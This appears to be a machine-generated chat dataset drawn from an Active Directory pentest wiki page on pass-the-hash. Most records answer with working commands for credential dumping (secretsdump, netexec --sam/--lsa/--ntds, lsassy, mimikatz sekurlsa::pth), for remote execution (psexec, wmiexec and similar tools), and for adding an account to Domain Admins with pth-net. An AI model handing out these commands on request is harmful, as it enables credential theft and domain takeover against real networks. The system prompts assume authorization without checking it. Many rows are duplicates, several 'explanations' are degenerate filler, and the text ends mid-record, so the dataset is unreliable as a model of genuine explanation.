{"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Pass the hash - Theory"}, {"role": "assistant", "content": "An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with overpass-the-hash)."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Pass the hash - Theory", "response": "An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-the-hash) (or indirectly over Kerberos with overpass-the-hash).", "metadata": {"corpus_index": 943, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain Pass the hash - Practice"}, {"role": "assistant", "content": "There are many tools that implement pass-the-hash: Impacket scripts (Python) (psexec, smbexec, secretsdump...), NetExec (Python), FreeRDP (C), mimikatz (C), lsassy (Python), pth-toolkit (Python) and many more.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket script secretsdump (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see dumping credentials from registry hives).\n\n``bash\nsecretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS\n`\n\n=== Command execution\n\nSome Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).\n\n`bash\npsexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain Pass the hash - Practice", "response": "There are many tools that implement pass-the-hash: Impacket scripts (Python) (psexec, smbexec, secretsdump...), NetExec (Python), FreeRDP (C), mimikatz (C), lsassy (Python), pth-toolkit (Python) and many more.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket script secretsdump (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see dumping credentials from registry hives).\n\n``bash\nsecretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS\n`\n\n=== Command execution\n\nSome Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).\n\n`bash\npsexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n", "metadata": {"corpus_index": 944, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Pass the hash - Practice"}, {"role": "assistant", "content": "There are many tools that implement pass-the-hash: Impacket scripts (Python) (psexec, smbexec, secretsdump...), NetExec (Python), FreeRDP (C), mimikatz (C), lsassy (Python), pth-toolkit (Python) and many more.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket script secretsdump (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see dumping credentials from registry hives).\n\n``bash\nsecretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS\n`\n\n=== Command execution\n\nSome Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).\n\n`bash\npsexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Pass the hash - Practice", "response": "There are many tools that implement pass-the-hash: Impacket scripts (Python) (psexec, smbexec, secretsdump...), NetExec (Python), FreeRDP (C), mimikatz (C), lsassy (Python), pth-toolkit (Python) and many more.\n\n::: tabs\n\n=== Credentials dumping\n\nThe Impacket script secretsdump (Python) has the ability to remotely dump hashes and LSA secrets from a machine (LMhash can be empty) (see dumping credentials from registry hives).\n\n``bash\nsecretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets. The bh_owned has the ability to set targets as \"owned\" in BloodHound (see dumping credentials from registry hives).\n\n`bash\nnetexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds\n`\n\nLsassy (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as \"owned\" in BloodHound. It works in standalone but also as a NetExec module (see dumping credentials from lsass process memory).\n\n`bash\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS\n`\n\n=== Command execution\n\nSome Impacket scripts enable testers to execute commands on target systems with pass-the-hash (LMhash can be empty).\n\n`bash\npsexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\n`\n\nNetExec (Python) has the ability to do it on a set of targets\n", "metadata": {"corpus_index": 944, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use secretsdump.py for pass the hash - practice?"}, {"role": "assistant", "content": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use secretsdump.py for pass the hash - practice?", "response": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'", "metadata": {"corpus_index": 945, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "secretsdump.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Pass the hash - Practice?"}, {"role": "assistant", "content": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Pass the hash - Practice?", "response": "secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'\nsecretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'", "metadata": {"corpus_index": 945, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `secretsdump.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 945, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the netexec command to pass the hash - practice"}, {"role": "assistant", "content": "netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the netexec command to pass the hash - practice", "response": "netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds", "metadata": {"corpus_index": 946, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Pass the hash - Practice"}, {"role": "assistant", "content": "netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Pass the hash - Practice", "response": "netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds", "metadata": {"corpus_index": 946, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 946, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use netexec for pass the hash - practice?"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use netexec for pass the hash - practice?", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS", "metadata": {"corpus_index": 947, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Pass the hash - Practice"}, {"role": "assistant", "content": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Pass the hash - Practice", "response": "netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd\nlsassy -u $USER -H $NThash $TARGETS\nlsassy -d $DOMAIN -u $USER -H $NThash $TARGETS", "metadata": {"corpus_index": 947, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 947, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the psexec.py syntax for pass the hash - practice?"}, {"role": "assistant", "content": "psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the psexec.py syntax for pass the hash - practice?", "response": "psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 948, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "psexec.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pass the hash - Practice during a pentest?"}, {"role": "assistant", "content": "psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pass the hash - Practice during a pentest?", "response": "psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nsmbexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\nwmiexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\natexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'\ndcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'", "metadata": {"corpus_index": 948, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `psexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 948, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the netexec command for pass the hash - practice"}, {"role": "assistant", "content": "netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami\nnetexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the netexec command for pass the hash - practice", "response": "netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami\nnetexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami", "metadata": {"corpus_index": 949, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "netexec"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Pass the hash - Practice"}, {"role": "assistant", "content": "netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami\nnetexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Pass the hash - Practice", "response": "netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami\nnetexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami\nnetexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami", "metadata": {"corpus_index": 949, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 949, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Pass the hash - Practice during a pentest?"}, {"role": "assistant", "content": "sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Pass the hash - Practice during a pentest?", "response": "sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash", "metadata": {"corpus_index": 950, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash`?"}, {"role": "assistant", "content": "This command is used for pass the hash - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$NThash`?", "response": "This command is used for pass the hash - practice. Practice", "metadata": {"corpus_index": 950, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": "Pass the hash", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the pth-net command for pass the hash - practice"}, {"role": "assistant", "content": "pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER\npth-net rpc group addmem \"Domain admins\" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the pth-net command for pass the hash - practice", "response": "pth-net rpc group members \"Domain admins\" -U 'Domain/User%LMhash:NThash' -S $DOMAIN_CONTROLLER\npth-net rpc group addmem \"Domain admins\" Shutdown -U 'Domain/Admin%LMhash:NThash' -S $DOMAIN_CONTROLLER", "metadata": {"corpus_index": 951, "category": "credentials", "source_file": "docs/src/ad/movement/ntlm/pth.md", "page_title": 